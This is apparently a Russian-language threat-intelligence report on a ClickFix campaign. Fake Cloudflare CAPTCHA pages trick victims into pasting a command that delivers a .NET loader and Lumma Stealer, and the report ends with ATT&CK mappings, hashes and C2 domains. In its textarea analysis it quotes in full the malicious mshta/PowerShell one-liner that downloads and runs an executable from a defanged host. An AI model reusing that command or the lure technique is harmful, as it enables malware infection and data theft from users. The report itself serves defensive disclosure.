Введение:
Недавно мы выявили новую вредоносную кампанию, использующую поддельные страницы CAPTCHA для доставки Lumma Stealer — инструмента для кражи информации, работающего по модели «вредоносное ПО как услуга» (MaaS), впервые обнаруженного в 2022 году. В предыдущих кампаниях, в том числе в середине 2024 года, злоумышленники использовали ClickFix — обманную тактику, включающую фишинг и поддельные страницы reCAPTCHA для целевых страниц верификации Google.
В этой последней кампании злоумышленники продолжают использовать ClickFix, используя фишинг и поддельные страницы reCAPTCHA, чтобы обманным путём заставить жертв выполнить вредоносные команды, скопированные в буфер обмена. Однако теперь они переключили внимание на имитацию страниц верификации Cloudflare. В этом отчёте будут описаны различные этапы цепочки заражения ClickFix: страницы ClickFix, маскирующиеся под Cloudflare reCAPTCHA, и то, как злоупотребляет MSHTA и PowerShell для доставки загрузчика .NET.
Инфекционная цепь:
Цепочка заражения начинается с поддельной страницы CAPTCHA, призванной обманным путём заставить жертву выполнить вредоносную команду. На веб-странице отображается обманное сообщение типа «Я не робот — проверка Cloudflare», предлагающее пользователю скопировать и выполнить указанную команду в диалоговом окне «Выполнить» Windows. После выполнения команда запускает mshta.exe, который выполняет встроенный скрипт VBScript. Скрипт VBScript создаёт объект WScript.Shell для выполнения PowerShell Затем PowerShell использует Invoke-WebRequest для загрузки вредоносной нагрузки (g.exe) с удалённого сервера и сохранения её в папке «Загрузки». После этого v.exe запускается с помощью Start-Process, инициируя следующий этап атаки. Файл v.exe выступает в роли загрузчика, который расшифровывает и внедряет Lumma Stealer в память.


Анализ встроенного JS-скрипта:
Этот скрипт предназначен для проведения атаки с использованием социальной инженерии, обманным путём заставляя пользователей копировать и выполнять вредоносные команды PowerShell. Атака маскируется под процесс проверки подлинности пользователя Cloudflare, создавая видимость подлинности, но при этом скрытно выполняя вредоносные действия.
Вредоносные элементы в текстовой области:
Вредоносный JS-скрипт содержит два элемента текстовой области, в которые встроены вредоносные команды PowerShell и MSHTA. Первая полезная нагрузка выполняет команду PowerShell, предназначенную для загрузки и запуска вредоносного файла (kyc.mp4) с сайта hxxps[:]//deskbot.net. Этот метод использовался для доставки Lumma Stealer, что прокомментировано в JavaScript-файле (см. рис. 3).
Второй элемент текстовой области использует mshta.exe для выполнения сценария VBScript, который запускает команду PowerShell.
mshta vbscript:Execute(“CreateObject(“”WScript.Shell””).Run(“”powershell -c iwr 'hxxps[:]//kvndbb3[.]com/g[.]exe' -o $HOME\Downloads\v.exe; Start-Process $HOME\Downloads\v.exe””,0)(window.close) ' Я не робот – Идентификатор проверки Cloudflare: 5mUiAHM”)
Он использует Invoke-WebRequest (iwr) для загрузки «g.exe” от kvndbb3[.]com и сохраняет его как «v.exe» в папке «Загрузки». И затем запускает его с помощью Start-Process. Этот метод используется в качестве техники обхода защиты при атаках вредоносных программ, использующих такие процессы, как mshta.exe и WScript.Shell.



Тактика поддельной человеческой верификации:
Одним из самых обманчивых аспектов этого скрипта является использование им механизма фальшивой человеческой верификации. Он имитирует процесс верификации Cloudflare, заставляя пользователей поверить в необходимость выполнения дополнительного шага. Когда пользователь нажимает кнопку верификации, скрипт автоматически копирует скрытую вредоносную команду в буфер обмена. Затем жертву обманным путём заставляют вставить и выполнить эту команду в терминале, что позволяет загрузить и запустить вредоносное ПО.
Для повышения эффективности атаки скрипт включает перевод на несколько языков (английский, испанский, китайский, арабский, хинди и другие). Это означает, что злоумышленник нацелен на глобальную аудиторию, что повышает вероятность успешного заражения.
Механизм перехвата буфера обмена:

В сценарии используется copyToClipboard() Функция, которая выбирает вредоносную команду PowerShell в скрытой текстовой области и копирует её в буфер обмена при нажатии пользователем кнопки подтверждения. Это скрытый метод, позволяющий пользователю неосознанно выполнить вредоносный код. Как показано на рисунках 3 и 5.
После копирования злоумышленник просит пользователя вставить и выполнить команду в терминале PowerShell. При выполнении вредоносная программа загружается, устанавливается и потенциально используется для закрепления на компьютере жертвы.
Анализ загрузчика dotnet:

Загрузчик использует различные методы противодействия анализу, чтобы помешать исследователям и избежать обнаружения. Наш анализ показал, что загрузчик отслеживает время выполнения для обнаружения отладочных сред или песочниц. Эта проверка помогает ему выявлять потенциальные попытки анализа, как показано на рисунке 8.

В ходе анализа загрузчика мы обнаружили, что он расшифровывает вторую полезную нагрузку, используя ключ, показанный на рисунке 9. Затем расшифрованный код внедряется в память процесса с помощью API Например, VirtualProtect, а затем WriteProcessMemory и CreateThread для выполнения внедренной полезной нагрузки. Этот метод обычно используется для обхода обнаружения и обеспечивает запуск вредоносного кода в памяти, как показано на рисунке 10 ниже.


Анализ полезной нагрузки (Lumma Stealer):
Образец полезной нагрузки представляет собой 32-битный образец с зашифрованными данными и строками.

Он выводит диалоговое окно с сообщением «Вы хотите запустить вредоносную программу», которое служит окончательной проверкой перед выполнением вредоносной программы, как показано на рисунке 12.

Возможности разрешения API:
Он имеет возможность разрешать API с использованием техники хеширования API, показанной на рисунке 13 ниже.

Эксфильтрация данных
вредоносных программ использует API Windows GDI, включая BitBlt и CreateCompatibleBitmap, для захвата всего экрана и сохранения захваченного содержимого в виде растрового изображения.

Он также пытается украсть конфиденциальные данные из буфера обмена, используя API GetClipboardData. После извлечения данных он устанавливает соединение C2C (командно-контрольное соединение) для извлечения украденной информации.

Соединение C2C:
Вор использует Mozilla/5.0 в строке User-Agent, чтобы маскироваться под легитимный веб-трафик при взаимодействии со своими серверами C2C. Эта тактика помогает воровать данные, избегая обнаружения антивирусными системами, которые отслеживают сетевой трафик на предмет аномалий.


Вредоносное ПО использует семь жестко запрограммированных доменов в качестве серверов управления и контроля для обеспечения обновлений, получения команд и извлечения украденных данных.
Вывод:
Кампания ClickFix демонстрирует, как злоумышленники продолжают использовать методы социальной инженерии для обхода мер безопасности и обмана пользователей. В этой кампании, используя поддельные страницы Cloudflare CAPTCHA, перехват буфера обмена и злоупотребление утилитами Windows, такими как MSHTA и PowerShell, злоумышленники эффективно внедряют и запускают Lumma Stealer. Загрузчик .NET, использованный в этой атаке, включает в себя методы антианализа для обхода обнаружения. Использование нескольких языков в кампании указывает на глобальный подход к нацеливанию, что делает её широко распространённой угрозой.
Методы MITRE ATT&CK:
| Имя | Идентификатор техники | Имя |
| Поддельная проверка капчи | T1566 | Фишинг |
| Выполнение PowerShell | T1204
T1059.001 |
Пользовательское исполнение Интерпретатор команд и сценариев: PowerShell |
| Казнь Мшты
|
T1218.005
T1027.009 |
Выполнение системного двоичного прокси: Mshta Замаскированные файлы или информация: встроенные полезные нагрузки |
| Захват экрана | T1113 | Захват экрана |
| Выполнил зашифрованную полезную нагрузку с помощью powershell.exe
|
T1059.001
T1027.013 |
Интерпретатор команд и сценариев: PowerShell Зашифрованные файлы или информация: зашифрованный/кодированный файл |
| Захват ввода | T1056 | Keylogging |
| Уклонение от защиты | T1055.012 | Внедрение процесса: выемка процесса
|
| Введение контента | T1659 | Внедрение вредоносного кода в системы |
| Управление и контроль | T1071.001 | Протокол прикладного уровня: веб-протоколы
|
Степень защиты:
Троян.Ghanarava.1739530256ee4fbc
Троян.Ghanarava.1739337049382d41
Trojan.LummaStealerCiR
МНК:
| MD5 | Имя файла |
| 9A926390B4E4EF1EEC4E9E6C80382D41 | v.exe |
| 049F8BF92786B0AFF493BC8533EE4FBC | Полезная нагрузка Lumma |
| C2C | |
| ignoreshee.com | |
| breedertremnd.com | |
| garulouscuto.com | |
| torpdidebar.com | |
| hopeefreamed.com | |
| actiothreaz.com | |
| importenptoc.com | |
| rebeldettern.com | |
| torpdidebar.com | |
| voicesharped.com
|
|
Авторы:
Соумен Бирма
Вайбхав Билладе



